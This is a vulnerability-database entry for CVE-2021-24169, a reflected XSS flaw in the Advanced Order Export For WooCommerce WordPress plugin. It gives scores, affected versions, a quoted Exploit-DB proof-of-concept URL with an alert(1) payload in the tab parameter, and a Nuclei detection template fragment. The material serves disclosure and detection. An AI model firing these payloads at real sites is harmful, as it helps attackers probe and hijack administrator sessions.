CVE-2021-24169
published 2021-04-05CVE-2021-24169: This Advanced Order Export For WooCommerce WordPress plugin before 3.1.8 helps you to easily export WooCommerce order data. The tab parameter in the Admin…
PriorityP343medium6.1CVSS 3.1
AVNACLPRNUIRSCCLILAN
EXPLOIT
EPSS
10.35%
95.1th percentile
This Advanced Order Export For WooCommerce WordPress plugin before 3.1.8 helps you to easily export WooCommerce order data. The tab parameter in the Admin Panel is vulnerable to reflected XSS.
Affected
1 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| algolplus | advanced_order_export_for_woocommerce | < 3.1.8 | 3.1.8 |
CVSS provenance
nvdv3.16.1MEDIUMCVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
nvdv2.04.3MEDIUMAV:N/AC:M/Au:N/C:N/I:P/A:N
CVEs like this are exactly what “Exploited This Week” covers.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
No detection rules found.
Exploit-DB
WordPress Plugin Advanced Order Export For WooCommerce 3.1.7 - Reflected Cross-Site Scripting (XSS)
exploitdb·2021-09-23·CVSS 6.1
CVE-2021-24169 [MEDIUM] WordPress Plugin Advanced Order Export For WooCommerce 3.1.7 - Reflected Cross-Site Scripting (XSS)
WordPress Plugin Advanced Order Export For WooCommerce 3.1.7 - Reflected Cross-Site Scripting (XSS)
---
# Exploit Title: WordPress Plugin Advanced Order Export For WooCommerce 3.1.7 - Reflected Cross-Site Scripting (XSS)
# Date: 15/2/2021
# Author: 0xB9
# Software Link: https://wordpress.org/plugins/woo-order-export-lite/
# Version: 3.1.7
# Tested on: Windows 10
# CVE: CVE-2021-24169
1. Description:
This plugin helps you to easily export WooCommerce order data. The tab parameter in the Admin Panel is vulnerable to XSS.
2. Proof of Concept:
wp-admin/admin.php?page=wc-order-export&tab=alert(1)
Nuclei
WordPress Advanced Order Export For WooCommerce <3.1.8 - Authenticated Cross-Site Scripting
nuclei·CVSS 6.1
CVE-2021-24169 [MEDIUM] WordPress Advanced Order Export For WooCommerce <3.1.8 - Authenticated Cross-Site Scripting
WordPress Advanced Order Export For WooCommerce alert(document.domain) HTTP/1.1
Host: {{Hostname}}
matchers:
- type: dsl
dsl:
- 'status_code_2 == 200'
- 'contains(body_2, "alert(document.domain)")'
- 'contains(body_2, "woo-order-export-lite")'
condition: and
# digest: 4a0a0047304502203260bf5b1b6daba5594b73fb832bd892ddf1c469fead8bc623560b74270eb4c102210092700ebf4e4dbee38b8405e6d13b4c8f322466364bc9a45f4477cb289019d5e7:922c64590222798bb761d5b6d8e72950
No writeups or analysis indexed.
http://packetstormsecurity.com/files/164263/WordPress-Advanced-Order-Export-For-WooCommerce-3.1.7-Cross-Site-Scripting.htmlhttps://wpscan.com/vulnerability/09681a6c-57b8-4448-982a-fe8d28c87fc3http://packetstormsecurity.com/files/164263/WordPress-Advanced-Order-Export-For-WooCommerce-3.1.7-Cross-Site-Scripting.htmlhttps://wpscan.com/vulnerability/09681a6c-57b8-4448-982a-fe8d28c87fc3
2021-04-05
Published